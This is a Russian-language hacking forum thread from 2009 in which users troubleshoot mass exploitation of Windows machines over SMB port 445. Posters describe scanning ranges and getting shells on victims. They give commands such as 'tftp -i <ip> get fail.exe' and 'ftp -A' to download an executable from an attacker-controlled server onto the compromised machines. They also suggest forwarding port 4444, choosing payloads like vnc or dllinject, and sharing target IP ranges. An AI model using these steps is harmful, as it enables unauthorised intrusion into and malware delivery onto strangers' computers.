HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.01.2009, 00:21
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

stopxaker

вообшето там у тебя 2526 порт был, но это уже не важно.
У тебя щас есть такой IP, по которому реально подключится через шелл по 445 порту? я в цельях убеждений, что у меня все в порядке!?
 
Ответить с цитированием

  #2  
Старый 08.01.2009, 04:30
dyExplode
Участник форума
Регистрация: 13.01.2008
Сообщений: 103
С нами: 9644793

Репутация: 43
По умолчанию

всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
 
Ответить с цитированием

  #3  
Старый 08.01.2009, 04:42
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
С нами: 9304710

Репутация: 558
По умолчанию

Цитата:
Сообщение от dyExplode  
всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
Так по поводу ftp , я уже писал , что фтп я настроил под anonymous без пароля , подошёл только такой способ , с паролями происходит висяк , тем боле на фиг нужен пароль , если всё равно фтп на дедике поднимать :



Цитата:
Сообщение от dyExplode  
всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы
Такое было когда был юзабельным LSA сплойт , в данном случае , из 20 компов на 3 если повезёт 5 можно поймать шелл

Последний раз редактировалось stopxaker; 08.01.2009 в 04:44..
 
Ответить с цитированием

  #4  
Старый 08.01.2009, 13:43
nepster
Участник форума
Регистрация: 14.01.2008
Сообщений: 132
С нами: 9643727

Репутация: 26
По умолчанию

Цитата:
Сообщение от dyExplode  
всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
Открываешь cmd и пишешь одной строчкой ftp -n xxx.xxx.xxx.xxx . ххх- айпи твоего фтп.
 
Ответить с цитированием

  #5  
Старый 08.01.2009, 05:12
dyExplode
Участник форума
Регистрация: 13.01.2008
Сообщений: 103
С нами: 9644793

Репутация: 43
По умолчанию

дак когда anonymous всеравно требует мэйл в качестве пароля.
проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.
 
Ответить с цитированием

  #6  
Старый 08.01.2009, 12:59
zeonx
Познающий
Регистрация: 08.12.2008
Сообщений: 40
С нами: 9169724

Репутация: 7
По умолчанию

Цитата:
Сообщение от dyExplode  
дак когда anonymous всеравно требует мэйл в качестве пароля.
проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.
tftp в этих случаях может помочь, можешь взять здесь , если стоишь за натом открывай порт 66, в cmd пишешь
Код:
 tftp -i tvoi-ip-adress get fail.exe
, -этот способ более удобный. У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.

Последний раз редактировалось zeonx; 08.01.2009 в 13:01..
 
Ответить с цитированием

  #7  
Старый 08.01.2009, 07:37
Daxa
Banned
Регистрация: 02.09.2007
Сообщений: 13
С нами: 9836338

Репутация: 30
По умолчанию

отлично работает ! Спасибки вам! :*
 
Ответить с цитированием

  #8  
Старый 08.01.2009, 14:18
NiGHt-LEshiY
Познающий
Регистрация: 15.11.2006
Сообщений: 82
С нами: 10255655

Репутация: 3
По умолчанию

Так, нашел хороший диапазон, для тех кто хочет проверить свои силы. Кидаю в ПМ. Просить тоже в ПМ)
 
Ответить с цитированием

  #9  
Старый 08.01.2009, 14:48
dyExplode
Участник форума
Регистрация: 13.01.2008
Сообщений: 103
С нами: 9644793

Репутация: 43
По умолчанию

наконец нашёл способ! ftp -A ip сервера буква нужна большая потому что -a и -A это разные ключи.
 
Ответить с цитированием

  #10  
Старый 08.01.2009, 14:54
NiGHt-LEshiY
Познающий
Регистрация: 15.11.2006
Сообщений: 82
С нами: 10255655

Репутация: 3
По умолчанию

Хех...большая буква и маленькая буква - разные. Всегда помните, а то люди иногда зря ругаются на глючность программы, перепутав регистр букв ;D
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
асм, дизасм, принцип работы процов на определенном уровне. Cthulchu "Железо" 0 05.01.2009 20:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.